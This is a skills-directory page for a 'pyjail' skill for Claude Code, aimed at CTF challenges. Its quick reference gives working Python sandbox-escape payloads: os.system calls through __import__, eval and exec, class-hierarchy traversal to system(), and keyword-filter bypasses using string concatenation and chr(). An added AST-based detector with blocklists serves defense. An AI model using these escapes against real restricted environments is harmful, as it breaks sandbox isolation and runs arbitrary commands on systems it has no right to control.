Python Sandbox Escape

Provides techniques to escape restricted Python eval/exec environments, including basic command execution, class hierarchy traversal, and keyword bypasses using encoding or concatenation. Useful for penetration testing and CTF challenges involving Python jails or sandbox restrictions.

by Skills Guide Bot
Security, Intermediate
806/2/2026
Claude Code
#python#sandbox-escape#security#ctf#jail

Our review

This skill helps escape Python sandbox restrictions, such as in CTF challenges or filtered eval/exec environments.

Strengths

  • Provides a systematic workflow to identify and bypass keyword/character filters.
  • Offers proven techniques like class hierarchy traversal, encoding, and string concatenation.
  • Includes detailed reference files for advanced bypasses and complete payloads.

Limitations

  • Requires intermediate Python knowledge and understanding of the object model.
  • May fail if the sandbox blocks access to the class hierarchy or builtins.
  • Some modern environments may have patches against these common escapes.

When to use it

Use this skill when facing a Python sandbox that restricts eval/exec or filtered input, and you need to execute arbitrary code.

When not to use it

Avoid this skill if the environment is not Python-based or if you already have unrestricted shell access.

Security analysis

Caution
Quality score: 90/100

The skill teaches techniques for escaping restricted Python interpreters to run shell commands. While intended for CTF challenges and educational use, these methods could be applied maliciously. No direct malicious payloads or destructive instructions are present, but the allowed Bash tool combined with these escape methods could lead to system compromise if abused.

Findings
  • Provides methods to bypass Python sandbox restrictions and execute arbitrary OS commands, which could be misused in unauthorized environments.

Examples

Basic OS command execution
I'm in a Python jail that blocks the word 'os'. How can I execute a system command to read flag.txt?
Bypass filter with class hierarchy
The sandbox blocks __import__ and builtins. Use class hierarchy to get a file read capability.
Find useful subclass index
Help me find the index of a callable subclass in Python's object hierarchy so I can spawn a shell.

name: pyjail
description: Escapes Python sandbox restrictions. Use when working with restricted Python eval/exec environments, sandbox escapes, filtered input challenges, or Python jail challenges.
allowed-tools: Bash, Read, Write, Grep, Glob

Python Jail Escape Skill

Quick Workflow

Progress:
- [ ] Identify restrictions (blocked keywords/chars)
- [ ] Try basic escapes first
- [ ] If builtins blocked, use class hierarchy
- [ ] Bypass filters with encoding/concatenation
- [ ] Execute command to get flag

Quick Reference - Common Escapes

# Basic command execution
__import__('os').system('cat flag.txt')
eval("__import__('os').system('id')")
exec("import os; os.system('ls')")

# Using breakpoint (Python 3.7+)
breakpoint()  # Drops into pdb, then !cat flag.txt

# No builtins - class hierarchy
().__class__.__base__.__subclasses__()[132].__init__.__globals__['system']('cat flag')

# Keyword bypass
__import__('o'+'s').system('cat flag')
__import__(chr(111)+chr(115)).system('cat flag')
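Added example (not part of the skill or its reference files): the substring filter that blocks the word 'os' beside a parse-tree check, run on the payloads from the quick reference above. It shows why a source-level keyword filter misses the concatenation and chr() variants while an AST check flags the same names and dunder attributes regardless of how they are spelled. The blocklists and the sample payloads are assumptions chosen to match this page.

```python
import ast

# Assumed denylists for the AST check; the page's jail only blocks the word 'os'.
BLOCKED_NAMES = {"__import__", "eval", "exec", "breakpoint", "compile", "open"}
BLOCKED_ATTRS = {"__class__", "__base__", "__bases__", "__mro__", "__subclasses__",
                 "__globals__", "__builtins__", "__init__", "__dict__"}

# Constructed samples, taken from the quick reference above.
PAYLOAD_PLAIN = "__import__('os').system('cat flag.txt')"
PAYLOAD_CONCAT = "__import__('o'+'s').system('cat flag')"
PAYLOAD_CHR = "__import__(chr(111)+chr(115)).system('cat flag')"
PAYLOAD_HIERARCHY = ("().__class__.__base__.__subclasses__()[132]"
                     ".__init__.__globals__['system']('cat flag')")


def keyword_filter(src, words=("os",)):
    """Naive substring filter: returns the blocked words found in the raw source."""
    return [w for w in words if w in src]


def ast_findings(src):
    """Parse (never execute) the source and report blocked names, dunder attribute
    access and import statements. String building with '+' or chr() happens at
    run time, so it does not change the Name/Attribute nodes seen here."""
    try:
        tree = ast.parse(src, mode="exec")
    except SyntaxError as exc:
        return [f"syntax-error:{exc.msg}"]
    findings = []
    for node in ast.walk(tree):
        if isinstance(node, ast.Name) and node.id in BLOCKED_NAMES:
            findings.append(f"name:{node.id}")
        elif isinstance(node, ast.Attribute) and (
                node.attr in BLOCKED_ATTRS
                or (node.attr.startswith("__") and node.attr.endswith("__"))):
            findings.append(f"attr:{node.attr}")
        elif isinstance(node, (ast.Import, ast.ImportFrom)):
            findings.append("import-statement")
    return findings


def is_allowed(src):
    """Accept only source with no AST findings. This is a detection aid, not a
    sandbox: attribute names resolved at run time are invisible to a source check,
    so untrusted code still belongs in a separate process or container."""
    return ast_findings(src) == []
```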

Reference Files

| Topic | Reference |
|-------|-----------|
| Bypass Techniques | reference/bypass.md |
| Complete Payloads | reference/payloads.md |

Quick Debugging

# Find useful class index
for i, c in enumerate(().__class__.__base__.__subclasses__()):
    if 'wrap' in str(c): print(i, c)

# Check available builtins
dir(__builtins__)